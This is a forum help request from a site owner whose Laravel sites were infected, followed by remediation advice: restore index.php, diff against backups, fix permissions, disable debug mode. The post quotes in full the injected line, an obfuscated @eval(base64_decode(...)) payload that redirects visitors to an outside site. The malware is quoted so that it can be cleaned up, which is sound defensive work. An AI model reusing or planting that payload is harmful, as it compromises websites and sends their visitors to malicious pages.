# How to get rid of aeR4Choc (malicious code) on my Laravel websites?

Tags: laravel

All my Laravel websites have been infected by a malicious code named aeR4Choc.
It seems to (only???) infect the public/index.php file by redirecting to malicious sites.
here's the line that can be decoded:

```
/*aeR4Choc_start*/@eval(base64_decode('aWYoIWRlZmluZWQoImNoYWVKb3U3IikpewogICAgZGVmaW5lKCJjaGFlSm91NyIsIDEpOwogICAgZnVuY3Rpb24gaXNNb2JpbGUoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdhbmRyb2lkJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnYmxhY2tiZXJyeScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwaG9uZScpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwYWQnKSAhPT0gZmFsc2UKICAgICAgICAgICAgfHwgc3RycG9zKCR1YWdlbnRTdHIsICdpcG9kJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnb3BlcmEgbWluaScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2llTW9iaWxlJykgIT09IGZhbHNlKXsKICAgICAgICAgICAgcmV0dXJuIHRydWU7CiAgICAgICAgfQogICAgICAgIHJldHVybiBmYWxzZTsKICAgIH0KCiAgICBmdW5jdGlvbiBpc0Rlc2t0b3AoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdlZGdlJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnbXNpZScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ29wcicpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9taXVtJykgIT09IGZhbHNlCiAgICAgICAgICAgIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnZmlyZWZveCcpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9tZScpICE9PSBmYWxzZSl7CiAgICAgICAgICAgIHJldHVybiB0cnVlOwogICAgICAgIH0KICAgICAgICByZXR1cm4gZmFsc2U7CiAgICB9CgogICAgJHJlZGlyVG8gPSAiaHR0cHM6Ly93d3cucm94b2Vub3MueHl6LyI7CiAgICAkY2hlY2tDb29rUmVkaXJTdHIgPSAiYWVOZWU4cGkiOwogICAgJHJlZGlyZWN0QWxsb3cgPSB0cnVlOwogICAgZm9yZWFjaCAoJF9DT09LSUUgYXMgJGNvb2tLZXk9PiRjb29rVmFsKXsKICAgICAgICBpZiAoc3RycG9zKCRjb29rS2V5LCAnd29yZHByZXNzX2xvZ2dlZF9pbicpICE9PSBmYWxzZSB8fCAkY29va0tleSA9PSAkY2hlY2tDb29rUmVkaXJTdHIpIHsKICAgICAgICAgICAgJHJlZGlyZWN0QWxsb3cgPSBmYWxzZTsKICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQogICAgfQoKICAgICR1YWdlbnQgPSBzdHJ0b2xvd2VyKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7CgogICAgaWYgKCRyZWRpcmVjdEFsbG93KXsKICAgICAgICBpZihpc01vYmlsZSgkdWFnZW50KSB8fCBpc0Rlc2t0b3AoJHVhZ2VudCkpIHsKICAgICAgICAgICAgc2V0Y29va2llKCRjaGVja0Nvb2tSZWRpclN0ciwgIjEiLCB0aW1lKCkgKyA2MDQ4MDApOwogICAgICAgICAgICBoZWFkZXIoIkxvY2F0aW9uOiAkcmVkaXJUbyIpOwogICAgICAgICAgICBkaWU7CiAgICAgICAgfQogICAgfQp9'));/*aeR4Choc_end*/
```

My questions:

- How to get rid of it ? Just by deleting it?
- How did it happened and how can I prevent further attacks?

Thanks!

Comment: Do you have a WordPress install on the same server?

Comment: So the 'hole' came from a contact form coded in plain PHP... Thank you for your help!

Answer (score 0):

I would start by restoring the original index.php file from the Laravel install. You can just delete the code, but they may have added more (like a cors header). Might want to load up a backup from before the hack and run a diff to see what other files were altered.

Check the file permissions on index.php - change it to 644 and change the owner to root and group to www (if you have that group).

If you have debug=true in your .env file you may be open to attack
https://www.ambionics.io/blog/laravel-debug-rce